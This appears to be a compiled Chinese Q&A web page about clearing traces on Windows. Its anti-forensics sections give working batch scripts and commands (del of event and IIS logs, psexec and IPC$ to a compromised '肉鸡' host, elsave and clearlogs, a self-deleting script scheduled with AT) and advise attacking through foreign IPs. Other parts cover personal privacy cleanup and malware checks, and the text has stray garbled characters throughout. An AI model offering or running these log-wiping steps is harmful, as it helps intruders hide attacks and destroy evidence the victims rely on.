目录：

• 1、如何清除入侵日志！
• 2、为什么总有黑客进入我的电脑用我的播放器看视频，删除我的历史记录？
• 3、网站老是被黑客入侵怎么办啊？数据都被删掉了！
• 4、黑客清理痕迹问题
• 5、用黑客手段.入侵咯游戏服务器.怎么样才能把当时在服务器上的痕迹去掉.入侵玩马上就能去的那种
• 6、如何清除电脑“黑客”？

如何清除入侵日志！

一、日志文件的位置

Windows 2000的系统日志文件有应用程序日志，安全日志、系统日志、DNS服务器日志等等，应用程序日志、安全日志、系统日志、DNS日志默认位置：%systemroot%system32config。

安全日志文件：%systemroot%system32configSecEvent.EVT

系统日志文件：%systemroot%system32configSysEvent.EVT

应用程序日志文件：%systemroot%system32configAppEvent.EVT

有的管理员很可能将这些日志重定位（所以日志可能不在上面那些位置），其中EVENTLOG下面有很多的子表，在里面可查到以上日志的定位目录。

二、清除自己电脑中的日志

如果你要清除自己电脑中的日志，可以用管理员的身份来登录Windows，然后在“控制面板”中进入“管理工具”，再双击里面的“事件查看器”。打开后我们就可以在这里清除日志文件了，里面有应用程序、安全和系统日志文件。举个例子，比方说你想清除安全日举猛志，可以右键点击“安全日志”，在弹出的菜单中选择“属性”。接下来在弹出的对话框中，点击下面“清除日志”按钮就可以清除了，如果你想以后再来清除这些日志的话，可以将“按需要改写尺寸”，这样就可以在达到最大日志尺寸时进行改写事件了，不会提示你清除日志。

三、清除远程主机上的日志

大多数情况下，IIS的日志会忠实地记录它接收到的任何请求（也有特殊的不被IIS记录的攻击），一个优秀的系统管理员会利用这点来发现入侵的企图，保护自己的系统。所以如果你是黑客，入侵系统成功后第一件事便是清除日志，擦去自己的形迹，这时可以用以下两个办法：一是自己编写批处理文件来解决，编写一个能清除日志的批处理非常简单，方法是：新建一个具有如下内容的批处理文件：

@del c:winntsystem32logfiles*.*

@del c:winntsystem32config*.evt

@del c:winntsystem32dtclog*.*

@del c:winntsystem32*.log

@del c:winntsystem32*.txt

@del c:winnt*.txt

@del c:winnt*.log

@del c:del.bat

把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令，在它的前面加上“@”前缀字符，表示执行时本行在命令行或DOS里面不显示，另外del命令大家一定清楚吧？它是删除文件命令。

接下来再新建一个批处理文件，内容如下：

@copy del.bat ＼%1c$

@echo 向肉鸡复制本机的del.bat……OK

@psexec ＼%1 c:del.bat

@echo 在肉鸡上运行del.bat，清除日志文件……OK

保存为clean.bat即可，假设已经与肉鸡进行了Ipc连接，然后在CMD下输入：clean.bat 肉鸡IP，即可清除肉鸡上的日志文件。

清除日志的另外一个方法是借助第三方软件，如著名黑客软件流光的开发者黑客小榕的elsave.exe，就是是一款可以远程清除系统日志、应用程序日志、安全日志的软件，大家可以在网上下载到。elsave.exe使用起来很简单，首先利用获得的管理员正做桥账号与对方建立IPC会话：net use ＼ip pass /user: user，然后在命令行下执行如下命令：elsave -s ＼ip -l application -C，这样就删除了安全胡亏日志。

为什么总有黑客进入我的电脑用我的播放器看视频，删除我的历史记录？

1.清除最近使用过的文档记录

以Windows XP为例，右键点击“开始”按钮，选择“属性”，在弹出的设置任务栏和开始菜单属性对话窗中点“自定义”按钮，在“自定义开始菜单”对话框中的“高级”标签下点“清除列表”。若要让系统永不自作多情记住使用文档的记录，请去掉“列出我最近打开的文档”前的钩。

小提示：XP会把最粗隐近访问文档的快捷方式放在C:\Documents and Settings\用户名\Recent中，手工删除它们也能让文档菜单“失去记忆”。

2.删除临时文件夹中的内容

当执行过安装软件、打开文档等操作时，在临时文件夹中会留下相应文件，可以手工清除在下列位置中的内容：C:\Windows\Temp、C:\Documents And Settings\用户名\Local Settings\Temp。如在删除时提示有文件在使用，就需要关掉相关程序，最好重启一次再删除。

3.清除“运行”、“查找”等处的历史记录

清除“运行”对话框中记录的输入内容，可修改注册表。这些记录被保存在“HKEY_CURRENT_USER

\Software\Microsoft\Windows\CurrentVersion\Explorer\

RunMRU”分支下，将其完全删除后重启。此外，该主键下的“DocFindSpecMRU”项，在右侧栏目中显示的是“查找”的历史记录，可一并删除。

4.隐藏在IE中的行踪

上网后，会有大量信息反映你的所作所为，这还了得？

①清空Internet临时文件夹

别人查看“Internet临时文件夹”下的图片、Flash等文件便能大体知道你曾到过的网站。要清除它们，可依次单击IE菜单栏中的“工具”→“Internet选项”，打开“Internet选项”对话框，在“常规”标签中点击“删除文件”按钮，在弹出的“删除文件”窗口中勾选“删除所有脱机内容”，最后点击“确定”。

②我不要“小甜饼”（Cookie）

Cookie也可能是泄密的一个“罪魁祸首”，在“Internet选项”对话框的“常规”标签中单击“删除Cookies”按钮，待弹出窗口后单击“确定”按钮，可删除它们。

小提示：一种保险的办法是在上网后，进入Internet临时文件夹（该文件夹可在Internet选项对话框的“常规”选项下点“设置”来查看具体位置)，删除其下所有内容，这样，临时文件及Cookie等都会被清除。

③消除访问网页的历史记录

IE会将最近三周的访问历史记下，要“踏网无痕”可得清除它们，只要删除“C:\Documents and Settings\用户名\Local Settings\History”文件夹中的所有内容即可。也可在Internet选项对话框的“常规”标签下点“清除历史纪录”按钮。

要让IE不记录访问历史，请在Internet选项对话框的“常规”选项下，将网页保存在历史纪录中的天数从默认的20改成0即可。

④清除IE记住的表单内容

当访问网站时，一些网页会提示输入，例如，搜索时会要求输入肢凳搜索内容、登录邮箱则要填用户名、密码——这些东西会被IE自动记录。要删除它们，可在“Internet选项”对话框的“内容”标签下点岩饥厅“自动完成”按钮，在弹出的“自动完成设置”对话框中将“表单”、“表单上的用户名和密码”和“提示我保存密码”前的钩去掉，再单击“清除表单”、“清除密码”按钮，当询问时点“确定”。

⑤删除地址栏列表中的网址

在IE地址栏中输入要访问站点的部分字母时会自动打开列表，其中有最近曾访问的相匹配的站点，这也得清除。

在“Internet选项”对话框的“内容”标签下单击“自动完成”按钮，打开“自动完成”对话框，去掉“Web地址”前的钩。

若安装了“中文网址”软件，采用上法不能将地址栏列表中的“网络实名”清除，此时要在“Internet选项”对话框的“高级”选项卡下，选中“网络实名”中的“清除地址栏下拉列表中显示的网络实名”项，单击“确定”。

小提示：当完成上述操作后，千万别忘清空回收站。若此处没有收拾干净，就将前功尽弃了。

二、清除你在应用程序中的“行踪”

一些软件会记录曾打开的文件等信息。因此在将系统中的痕迹打扫后，别忘了清除在应用程序中曾留下的踪影。

1.还系统一个干净的QQ

QQ会自动记录登录号码和聊天记录，如何才能“聊天不留痕”呢？很简单，只要在QQ登录对话框中点“清除记录”按钮，系统将提示是否删除对应的所有记录文件等，勾选该项，然后输入QQ登录密码，点击“确定”即可。

另外，在QQ2004中可选择登录模式，如不想在退出QQ后保存相关记录，可选择“网吧模式”。如果还不放心，最好在退出QQ后手工清除QQ文件夹下用你的号码命名的文件夹。

2.清除MSN Messenger中的登录帐户信息

当在MSN Messenger中登录后，下次再登录会自动出现上次的用户名，要去掉它可在控制面板中双击“用户帐户”，然后选当前登录帐户，再选“创建我的NET PASSPORT”项，点击左侧“相关任务”下“管理我的网络密码”，在“储存用户名和密码”对话框中，选中要删除的帐户，点击“删除”按钮。

3.消除Office系列软件中的使用痕迹

Office 系列软件会保存打开过文件的快捷方式，需进入C:\Documents and Settings\用户名\Application Data\Microsoft\Office\Recent文件夹，删除其中的文件。

另外，在Word中记录了最近使用的一些文件，点击 “工具”→“选项”菜单项，在“常规”标签下去掉“列出最近使用文件”项前的勾，可让其不显示出来。而在Excel、PowerPoint、Access等中都有相应的选项，可按照相同的方法去掉痕迹。

4.清除网际快车中的下载信息

网际快车会自动保存下载文件的信息，要清除可用下列方法：在网际快车中，将“正在下载”和“已下载”文件夹中的项目全部删除（被删除的项目会放入“已删除”文件夹），再将“已删除”文件夹下的内容完全删除。

5.清除“暴风影音”的记录

暴风影音会自动记录以往曾播放过的文件，点击“查看”/“选项”，在选项对话框右侧去掉“保留最近打开文件的历史记录”，确定后可去掉播放记录。

6.消除RealOne的播放记录

单击“工具”菜单中“参数设置”，在弹出对话框的“类别”中选“普通”项，点击“清除历史记录”。如不想自动记录播放记录，需要取消“允许在文件菜单中显示历史记录列表”选项。

7.清除Windows Media Player的历史记录

在WMP播放器中，依次点击“工具”→“选项”→“隐私”项，单击“清除历史记录”按钮，可将“文件”菜单中“打开”和“打开URL”对话框中存储的信息删除；单击“清除CD/VCD”则可删除存储的播放过的CD和DVD的所有媒体信息。为了让其不再记录，就要去掉“在播放机中保存文件和URL历史记录”前的钩选。

8.让输入法没“记性”

很多输入法会自动记忆曾输入过的内容。下面以一些输入法为例说明如何让它“失忆”。

①智能ABC：它虽不将记忆内容显示在提示行中，但会将常用到的词汇保存在c:＼windows＼system文件夹下的“tmmr.rem”文件中，将其删除。如要它“失忆”，可右击输入法图标打开“属性设置”，在对话框中去掉“词频调整”前的钩选即可。

②拼音加加：右击输入法图标，选择“设置”，然后在“设置”标签下选中“禁用词频调整”。要避免对单字也不调整频度，就要选择“单字频度调整方式”下的“禁用”。

③陈桥五笔：陈桥五笔会将输入过的内容自动记录到C:＼chenhu2＼cwbzlcz1.chh和cwbzlcz2.chh文件中，用写字板打开便可查看，这岂不是会泄密？因此在使用后务必将它们删除掉。

9 .用Maxthon清除上网记录

如果你使用Maxthon浏览器来上网，那要清除上网痕迹就非常简单了，你不需要逐项清除网页历史、搜索栏历史、cookie等，只要点击“工具”菜单中的“清除浏览记录”→“全部清除”，并在弹出中的对话框中点击“是”即可。

网站老是被黑客入侵怎么办啊？数据都被删掉了！

你说的这种防火墙是防止DDOS攻击和cc攻击以及防御一些低级黑客的攻击像SQL注入攻凯手击喊戚以及XSS跨站攻击都属于低级攻击，像数据库中的数据被删掉以及数据被篡改的问题属于网站代码上存在漏洞或者是通盯渗嫌过网站代码漏洞提权拿到了服务器权限，导致留了系统级别的反向后门从而进行删除的，如果对安全防护这块不懂的话可以向SINE安全寻求技术支持。

黑客清理痕迹问题

下面是我在网上搜到的，不明白怎么具体操作：

使用方法:

Usage: clearlogs [\\computername] -app / -sec / -sys

-app = 应用程序日志

-sec = 安全日志

-sys = 系统日志

a. 可以清除远程计算机的日志

** 先用ipc连接上去: net use \\ip\ipc$ 密码/user:用户名

** 然后开始清除: 方法

clearlogs \\ip -app 这个是清除远程计算机的应用程序日志

clearlogs \\ip -sec 这个是清除远程计算机的安全日志

clearlogs \\ip -sys 这个是清除远程计算机的系统日志

b.清除本机日志: 如果和远程计算机的不能空连接. 那么就需要数物把这个工具传到远程计算机上面

然后清除. 方法:

clearlogs -app 这个是清除远程计算机的应用程序日志

clearlogs -sec 这个是清除远程计算机的安全日志

clearlogs -sys 这个是清除远程计算机的系统罩?

安全日志已经被清除.Success: The log has been cleared 成功.

为了更安全一点.同样你也可以建立一个批处理文件.让自动清除. 做好批处理文件.然后用at命令建立一个计划任务. 让自动运行. 之后你就可以离开你的肉鸡了.

例如建立薯坦液一个 c.bat

rem ============================== 开始

@echo off

clearlogs -app

clearlogs -sec

clearlogs -sys

del clearlogs.exe

del c.bat

exit

rem ============================== 结束

在你的计算机上面测试的时候 可以不要 @echo off 可以显示出来. 你可以看到结果

第一行表示: 运行时不显示窗口

第二行表示: 清除应用程序日志

第三行表示: 清除安全日志

第四行表示: 清除系统日志

第五行表示: 删除 clearlogs.exe 这个工具

第六行表示: 删除 c.bat 这个批处理文件

第七行表示: 退出

用AT命令. 建立一个计划任务. 这个命令在原来的教程里面和杂志里面都有. 你可以去看看详细的使用方信拦法

AT 时间 c:\c.bat

用黑客手段.入侵咯游戏服务器.怎么样才能把当时在服务器上的痕迹去掉.入侵玩马上就能去的那种

这个要看管理员的设举歼置，入侵日志可以清除，但是还是会有痕迹，基本要全部清除羡枝很麻烦，但是可以用国外正派冲IP进行入侵，这样对方就很难找到你

如何清除电脑“黑客”？

现在是高速信息网络时代，一些无聊的人常常利用E－mail方式将一些黑客软件放到你的计算机上，以控制你的计算机，如BO软件就是一个非常有名的黑客软件。要查看你的计算机是否有黑客的入侵，从注册表中或许可以查看到，具体操作如下：

按“开始”、“运行”，在拦激“打开”文本框中输入“Regedit”，启动注册表编辑器简山袜进入HKEY－LOCAL－MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼RunServices分支，检查右边窗口的“＠默认”键值，如果是“〈空格〉．exe”唯世，看来这台计算机可能已经被黑客入侵。请删除该“＠默认”的“．exe”键值。

最后，重新启动计算机。